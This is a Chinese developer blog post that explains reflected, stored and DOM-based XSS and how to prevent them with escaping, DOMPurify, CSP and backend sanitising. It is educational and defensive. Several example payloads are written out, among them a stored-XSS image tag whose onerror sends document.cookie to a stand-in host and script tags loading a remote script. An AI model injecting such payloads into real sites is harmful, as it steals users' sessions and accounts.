别瞎搞！XSS不是用来干坏事的，但你得懂它怎么防

友情提示：本文全程碎碎念，代码比字多，看完还不会防XSS，你来深圳请我喝奶茶，我当面给你调试到哭。

听说你想“注入链接”？先醒醒！

周五晚上十一点，我正窝在工位改 bug，产品突然@我：
“哥，用户反馈点了个搜索链接，账号里的券全没了，是不是你们前端又瞎拼接 URL 了？”
我心里“咯噔”一下，赶紧打开监控，Console 里一条红得发紫的报错：
Uncaught SyntaxError: Unexpected token '<'
再瞄一眼 URL——好家伙，搜索词里塞了段<script src="//xss.pt/laoge.js"></script>，
浏览器还贴心地帮我执行了。
那一刻，我深刻体会到什么叫“社会性死亡”。

XSS到底是个啥玩意儿

说人话：Cross-Site Scripting，跨站脚本攻击，
就是坏人把你网页当画板，在上面乱涂乱“脚本”。
涂完了，用户一访问，浏览器傻乎乎地执行，
Cookie、token、甚至银行卡余额，统统打包送黑客。
（别问为啥不叫 CSS，问就是被层叠样式表先抢注了。）

三种经典姿势（别想歪）

反射型：URL 里藏雷，一点就炸

用户点开https://kao.la/search?kw=<script>alert(document.cookie)</script>，
后端把 kw 原样吐回前端，前端直接innerHTML = kw，
浏览器一看，哟，脚本，走你！
全程不落地，像快递小哥“即拿即送”，所以叫“反射”。

存储型：评论区埋地雷

用户 A 发条留言：
“楼主好人一生平安！<img src=x οnerrοr=fetch(‘//xss.pt/steal?c=’+document.cookie)>”
后端存进数据库，前端拉回来展示，
所有围观群众一打开帖子，Cookie 被悄咪咪顺走。
地雷一直躺在那，谁踩谁炸，持久又酸爽。

DOM 型：纯前端也能翻车

不写后端也能中招，典范就是“路由劫持”。
https://kao.la/#/<img src=x onerror=alert(1)>
前端路由用location.hash拼页面标题：
title.innerHTML = '搜索结果：' + decodeURIComponent(location.hash.slice(1))
得，又一颗雷。
（别笑，我当年真这么写过，还被挂在公司耻辱柱上。）

为啥XSS这么让人头疼？

它不黑服务器，只黑用户，
可用户一沦陷，服务器照样背锅。
想象一下：
大促零点，用户 A 被 XSS 偷了登录态，
黑客拿 token 去下单 100 台 iPhone，
第二天客服电话被打爆，
老板一句“谁写的代码谁赔”，
工资瞬间变负数。
浏览器再智能，也架不住开发亲手给黑客递刀。

真实项目里XSS是怎么冒出来的？

1. 富文本编辑器“裸奔”
   后台配置了个“支持 HTML”，
   运营小姐姐开开心心贴了一段从 Word 拷来的表格，
   里面暗藏<script>，
   前端为了“所见即所得”，直接v-html渲染，
   全站用户一起蹦迪。

2. 动态拼接 HTML 图省事
   列表页要标红关键词，后端返回纯文本，
   前端：

   item.innerHTML=`${userInput}`.replace(/关键词/g,'<em>关键词</em>')

   用户输入一坨：
   <img src=x onerror=alert(1)>关键词
   得，又炸。

3. URL 参数塞 innerHTML
   活动页要展示“来自微信的某某”，
   前端：

   document.getElementById('from').innerHTML=getQuery('name')

   黑客把 name 换成<script src="//xss.pt/laoge.js">，
   活动页秒变钓鱼站。

遇到XSS怎么排查？（老司机三板斧）

1. 打开 DevTools，Console 先看红字
   报错行号怼脸，顺着堆栈找innerHTML、document.write、eval这些高危 API。

2. 手动插 payload 测试
   输入框、搜索栏、URL 参数、hash、localStorage，
   挨个试：

   "><img src=x onerror=confirm(1)> <svg onload=alert(1)> javascript:alert(1)

   哪个弹窗=哪里裸奔。

3. 全局搜“=”号
   对，就是暴力搜innerHTML=、html(、dangerouslySetInnerHTML，
   凡是不带转义/过滤的，全部拉出来枪毙五分钟。

防XSS实战技巧（亲测有效，不忽悠）

1. 永远不要相信任何输入

产品、运营、甚至你自己昨天的代码，都可能埋雷。
把“所有外来内容都当屎”写在工位贴上，每天默念三遍。

2. 能用 textContent 就别碰 innerHTML

// ❌ 作死写法div.innerHTML=userNick// ✅ 老实人写法div.textContent=userNick

实在要渲染 HTML，先“消毒”——

3. 富文本白名单过滤，DOMPurify 一把梭

<scriptsrc="https://cdn.jsdelivr.net/npm/dompurify@3/dist/purify.min.js"></script><script>// 允许的标签&属性白名单constclean=DOMPurify.sanitize(dirtyHTML,{ALLOWED_TAGS:['p','br','strong','em','a','img'],ALLOWED_ATTR:['href','src','alt'],ALLOW_DATA_ATTR:false})document.getElementById('post').innerHTML=clean</script>

别自己写正则，你把握不住，真的。

4. CSP：浏览器帮你站岗

HTTP 响应头加一行：

Content-Security-Policy: default-src 'self'; script-src 'self' https://static.kuaishou.com; object-src 'none'

即使黑客塞了<script>，浏览器直接拦截，
妈妈再也不用担心我加班到秃头。

5. 前端路由 vigilante

// 路由守卫里做一层转义functionescapeHtml(str){returnstr.replace(/&/g,'&amp;').replace(/</g,'&lt;').replace(/>/g,'&gt;').replace(/"/g,'&quot;').replace(/'/g,'&#39;')}// 使用constkeyword=escapeHtml(decodeURIComponent(location.hash.slice(1)))document.title=`搜索结果：${keyword}`

别嫌土，能救命。

6. 本地数据也要验

localStorage、sessionStorage、cookie 里拿出来的东西，
指不定哪天被插件/代理篡改，
用 JSON Schema 过一遍，再丢进页面。

完整代码示例：一个“带刺”的搜索页如何安全落地

需求：用户输入关键词，高亮展示，还要保留换行。
危险点：关键词能塞脚本，换行要变<br>，得渲染 HTML。

<!DOCTYPEhtml><htmllang="zh-CN"><head><metacharset="utf-8"/><!-- 1. CSP 站岗 --><metahttp-equiv="Content-Security-Policy"content="default-src'self'; script-src'self'https://cdn.jsdelivr.net; style-src'self''unsafe-inline';"/><title>安全搜索示例</title><style>.highlight{background:#ff0}#result{white-space:pre-line;border:1px solid #ccc;padding:10px}</style></head><body><inputid="kw"placeholder="输入关键词，按回车搜索"/><buttononclick="search()">Search</button><divid="result"></div><!-- 2. 引入 DOMPurify --><scriptsrc="https://cdn.jsdelivr.net/npm/dompurify@3/dist/purify.min.js"></script><script>// 3. 转义函数functionescapeHtml(str){constmap={'&':'&amp;','<':'&lt;','>':'&gt;','"':'&quot;',"'":'&#39;'}returnstr.replace(/[&<>"']/g,m=>map[m])}// 4. 搜索逻辑functionsearch(){constraw=document.getElementById('kw').valueif(!raw)return// 先转义，再处理换行，再高亮letsafe=escapeHtml(raw)// Step1 转义safe=safe.replace(/\n/g,'<br>')// Step2 换行// 高亮关键词（此时已是纯文本，可放心 replace）constregex=newRegExp(`(${raw.replace(/[.*+?^${}()|[\]\\]/g,'\\$&')})`,'gi')consthighlighted=safe.replace(regex,'<span class="highlight">$1</span>')// Step3 过 DOMPurify 二次消毒（防自己手抖）constfinal=DOMPurify.sanitize(highlighted,{ALLOWED_TAGS:['span','br'],ALLOWED_ATTR:['class']})document.getElementById('result').innerHTML=final}// 5. URL 参数回显同样走一遍constparams=newURLSearchParams(location.search)constq=params.get('q')if(q){document.getElementById('kw').value=qsearch()}</script></body></html>

上面的流程：
输入 → 转义 → 业务替换 → 白名单消毒 → 渲染。
四层盔甲，黑客拿头都撞不开。

再来一个：React 项目里的“安全”与“不安全”

// ❌ 作死现场 function Vulnerable({ userUrl }) { // 把用户提供的 url 直接插背景 return <div style={{ backgroundImage: `url(${userUrl})` }} /> } // 黑客传：'); background-image:url('javascript:alert(1) // React 会报警告，但仍可能执行，别赌 // ✅ 正确姿势 import DOMPurify from 'dompurify' function Safe({ userUrl }) { // 先过白名单 const clean = DOMPurify.sanitize(userUrl, { ALLOWED_TAGS: [], ALLOWED_ATTR: [] }) // 再加一层 URL 校验 const isValid = /^https?:\/\/i\.xiaohongshu\.com\//.test(clean) if (!isValid) return null return <div style={{ backgroundImage: `url(${clean})` }} /> }

记住：React 的dangerouslySetInnerHTML名字都告诉你“危险”了，
别头铁。

彩蛋：用 Node 给富文本后端也加闸

constexpress=require('express')constDOMPurify=require('isomorphic-dompurify')constapp=express()app.use(express.json())app.post('/api/comment',(req,res)=>{const{content}=req.body// 后端再消毒一次，防止有人绕过前端直接调接口constclean=DOMPurify.sanitize(content,{ALLOWED_TAGS:['p','br','a','strong','em'],ALLOWED_ATTR:['href']})saveToDB(clean)res.json({ok:1})})

前后端双杀，黑客只能去楼下沙县小吃冷静一下。

你以为学完就能“搞事情”？

省省吧，兄弟。
真正值钱的能力是“让黑客无洞可钻”，
不是“钻别人洞”。
国内 SRC 平台（阿里、腾讯、字节都有）大把合法靶场，
去那练手，提交漏洞还能拿奖金，
不比偷偷摸摸进局子喝茶香？

大实话结尾

你写的每一行没转义的代码，
都是给黑客的邀请函；
你偷的每一个懒，
都可能变成明天凌晨三点的 P0 故障。
把“安全第一”刻进骨子里，
再谈优雅、谈性能、谈 KPI。
毕竟——
“代码能跑”只是及格线，
“代码能扛黑客”才配叫技术人。

（全文完，我要去给三年前的自己擦屁股了，告辞。）

欢迎来到我的博客，很高兴能够在这里和您见面！希望您在这里可以感受到一份轻松愉快的氛围，不仅可以获得有趣的内容和知识，也可以畅所欲言、分享您的想法和见解。

推荐：DTcode7的博客首页。
一个做过前端开发的产品经理，经历过睿智产品的折磨导致脱发之后，励志要翻身农奴把歌唱，一边打入敌人内部一边持续提升自己，为我们广大开发同胞谋福祉，坚决抵制睿智产品折磨我们码农兄弟！

吾辈才疏学浅，摹写之作，恐有瑕疵。望诸君海涵赐教。望轻喷，嘤嘤嘤

非常期待和您一起在这个小小的网络世界里共同探索、学习和成长。愿斯文对汝有所裨益，纵其简陋未及渊博，亦足以略尽绵薄之力。倘若尚存阙漏，敬请不吝斧正，俾便精进！